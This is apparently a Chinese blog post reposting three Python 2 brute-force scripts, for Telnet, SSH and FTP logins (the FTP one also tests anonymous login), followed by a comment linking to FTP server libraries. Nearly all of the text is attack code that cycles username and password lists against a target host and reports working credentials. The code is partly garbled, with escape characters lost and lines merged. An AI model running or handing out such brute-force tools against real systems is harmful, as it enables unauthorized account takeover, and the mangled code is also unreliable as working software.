Telnet爆破脚本:
#!usr/bin/python
#Telnet Brute Forcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, telnetlib
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>"
sys.exit(1)
try:
users = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your userlist pathn"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist pathn"
sys.exit(1)
print "nt d3hydr8[at]gmail[dot]com TelnetBruteForcer v1.0"
print "t--------------------------------------------------n"
print "[+] Server:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "nReloading Wordlist - Changing Usern"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
if len(users) ==1:
return value[0][:-1], users[0]
else:
return value[0][:-1], users[0][:-1]
class Worker(threading.Thread):
def run(self):
value, user = getword()
try:
print "-"*12
print "User:",user,"Password:",value
tn = telnetlib.Telnet(sys.argv[1])
tn.read_until("login: ")
tn.write(user + "n")
if password:
tn.read_until("Password: ")
tn.write(value + "n")
tn.write("lsn")
tn.write("exitn")
print tn.read_all()
print "tnLogin successful:",value, user
tn.close()
work.join()
sys.exit(2)
except:
pass
for I in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)
SSH的爆破脚本(比较罗嗦,待修改):
#!/usr/bin/env python
#-*-coding = UTF-8-*-
#author@:dengyongkai
#blog@:blog.sina.com.cn/kaiyongdeng
import sys
import os
import time
#from threading import Thread
try:
from paramiko import SSHClient
from paramiko import AutoAddPolicy
except ImportError:
print G+'''
You need paramiko module.
http://www.lag.net/paramiko/
Debian/Ubuntu: sudo apt-get install aptitude
: sudo aptitude install python-paramikon'''+END
sys.exit(1)
docs = """
[*] This was written for educational purpose and pentest only. Use it at your own risk.
[*] Author will be not responsible for any damage!
[*] Toolname : ssh_bf.py
[*] Author : xfk
[*] Version : v.0.2
[*] Example of use : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]
"""
if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)
R = "�33[31m";
G = "�33[32m";
Y = "�33[33m"
END = "�33[0m"
def logo():
print G+"n |---------------------------------------------------------------|"
print " | |"
print " | blog.sina.com.cn/kaiyongdeng |"
print " | 16/05/2012 ssh_bf.py v.0.2 |"
print " | SSH Brute Forcing Tool |"
print " | |"
print " |---------------------------------------------------------------|n"
print " n [-] %sn" % time.ctime()
print docs+END
def help():
print Y+" [*]-H --hostname/ip <>the target hostname or ip address"
print " [*]-P --port <>the ssh service port(default is 22)"
print " [*]-U --usernamelist <>usernames list file"
print " [*]-P --passwordlist <>passwords list file"
print " [*]-H --help <>show help information"
print " [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"+END
sys.exit(1)
def BruteForce(hostname,port,username,password):
'''
Create SSH connection to target
'''
ssh = SSHClient()
ssh.set_missing_host_key_policy(AutoAddPolicy())
try:
ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False)
status = 'ok'
ssh.close()
except Exception, e:
status = 'error'
pass
return status
def makelist(file):
'''
Make usernames and passwords lists
'''
items = []
try:
fd = open(file, 'r')
except IOError:
print R+'unable to read file '%s'' % file+END
pass
except Exception, e:
print R+'unknown error'+END
pass
for line in fd.readlines():
item = line.replace('n', '').replace('r', '')
items.append(item)
fd.close()
return items
def main():
logo()
# print "hello wold"
try:
for arg in sys.argv:
if arg.lower() == '-t' or arg.lower() == '--target':
hostname = str(sys.argv[int(sys.argv[1:].index(arg))+2])
if arg.lower() == '-p' or arg.lower() == '--port':
port = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-u' or arg.lower() == '--userlist':
userlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-h' or arg.lower() == '--help':
help()
elif len(sys.argv) <= 1:
help()
except:
print R+"[-]Cheak your parametars inputn"+END
help()
print G+"n[!] BruteForcing target ...n"+END
# print "here is ok"
# print hostname,port,wordlist,userlist
usernamelist = makelist(userlist)
passwordlist = makelist(wordlist)
print Y+"[*] SSH Brute Force Praparing."
print "[*] %s user(s) loaded." % str(len(usernamelist))
print "[*] %s password(s) loaded." % str(len(passwordlist))
print "[*] Brute Force Is Starting......."+END
try:
for username in usernamelist:
for password in passwordlist:
print G+"n[+]Attempt uaername:%s password:%s..." % (username,password)+END
current = BruteForce(hostname, port, username, password)
if current == 'error':
print R+"[-]O*O The username:%s and password:%s Is Disenbabled...n" % (username,password)+END
# pass
else:
print G+"n[+] ^-^ HaHa,We Got It!!!"
print "[+] username: %s" % username
print "[+] password: %sn" % password+END
# sys.exit(0)
except:
print R+"n[-] There Is Something Wrong,Pleace Cheak It."
print "[-] Exitting.....n"+END
raise
print Y+"[+] Done.^-^n"+END
sys.exit(0)
if __name__ == "__main__":
main()
FTP的爆破脚本(比较罗嗦,待修改):
#!/usr/bin/env python
#-*-coding = utf-8-*-
#author:@xfk
#blog:@blog.sina.com.cn/kaiyongdeng
#date:@2012-05-08
import sys, os, time
from ftplib import FTP
docs = """
[*] This was written for educational purpose and pentest only. Use it at your own risk.
[*] Author will be not responsible for any damage!
[*] Toolname : ftp_bf.py
[*] Coder :
[*] Version : 0.1
[*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt
"""
if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)
R = "�33[31m";
G = "�33[32m";
Y = "�33[33m"
END = "�33[0m"
def logo():
print G+"n |---------------------------------------------------------------|"
print " | |"
print " | blog.sina.com.cn/kaiyongdeng |"
print " | 08/05/2012 ftp_bf.py v.0.1 |"
print " | FTP Brute Forcing Tool |"
print " | |"
print " |---------------------------------------------------------------|n"
print " n [-] %sn" % time.strftime("%X")
print docs+END
def help():
print R+"[*]-t, --target ip/hostname <> Our target"
print "[*]-u, --usernamelist usernamelist <> usernamelist path"
print "[*]-p, --passwordlist passwordlist <> passwordlist path"
print "[*]-h, --help help <> print this help"
print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END sys.exit(1)
def bf_login(hostname,username,password):
# sys.stdout.write("r[!]Checking : %s " % (p))
# sys.stdout.flush()
try:
ftp = FTP(hostname)
ftp.login(hostname,username, password)
ftp.retrlines('list')
ftp.quit()
print Y+"n[!] w00t,w00t!!! We did it ! "
print "[+] Target : ",hostname, ""
print "[+] User : ",username, ""
print "[+] Password : ",password, ""+END
return 1
# sys.exit(1)
except Exception, e:
pass except KeyboardInterrupt: print R+"n[-] Exiting ...n"+END
sys.exit(1)
def anon_login(hostname):
try:
print G+"n[!] Checking for anonymous login.n"+END
ftp = FTP(hostname) ftp.login()
ftp.retrlines('LIST')
print Y+"n[!] w00t,w00t!!! Anonymous login successfuly !n"+END
ftp.quit()
except Exception, e:
print R+"n[-] Anonymous login failed...n"+END
pass
def main():
logo()
try:
for arg in sys.argv:
if arg.lower() == '-t' or arg.lower() == '--target':
hostname = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-u' or arg.lower() == '--usernamelist':
usernamelist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-p' or arg.lower() == '--passwordlist':
passwordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-h' or arg.lower() == '--help':
help()
elif len(sys.argv) <= 1:
help()
except:
print R+"[-]Cheak your parametars inputn"+END
help()
print G+"[!] BruteForcing target ..."+END
anon_login(hostname)
# print "here is ok"
# print hostname
try:
usernames = open(usernamelist, "r")
user = usernames.readlines()
count1 = 0
while count1 < len(user):
user[count1] = user[count1].strip()
count1 +=1
except:
print R+"n[-] Cheak your usernamelist pathn"+END
sys.exit(1)
# print "here is ok ",usernamelist,passwordlist
try:
passwords = open(passwordlist, "r")
pwd = passwords.readlines()
count2 = 0
while count2 < len(pwd):
pwd[count2] = pwd[count2].strip()
count2 +=1
except:
print R+"n[-] Check your passwordlist pathn"+END
sys.exit(1)
print G+"n[+] Loaded:",len(user),"usernames"
print "n[+] Loaded:",len(pwd),"passwords"
print "[+] Target:",hostname
print "[+] Guessing...n"+END
for u in user: for p in pwd:
result = bf_login(hostname,u.replace("n",""),p.replace("n",""))
if result != 1:
print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END
else:
print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END
if not result :
print R+"n[-]There is no username ans password enabled in the list."
print "[-]Exiting...n"+END
if __name__ == "__main__":
main()
上面的3个脚本都还没有测试,等测试了之后把测试效果补充上。然后还有别的爆破脚本以后慢慢补充,不同的情况有不同的方法,要灵活运用!
《“一些有用的Python脚本[bak]”》 有 1 条评论
One line ftp server in python
https://stackoverflow.com/questions/4994638/one-line-ftp-server-in-python
`
pip3 install pyftpdlib
twistd -n ftp
`
https://docs.twistedmatrix.com/en/stable/core/examples/#ftp-examples
Extremely fast and scalable Python FTP server library
https://github.com/giampaolo/pyftpdlib
https://pyftpdlib.readthedocs.io/en/latest/tutorial.html#event-callbacks
Pyftpdlib 使用方法
https://blog.csdn.net/xuq09/article/details/84936853
python-ftp-server (Command line FTP server tool designed for performance and ease of use.)
https://pypi.org/project/python-ftp-server/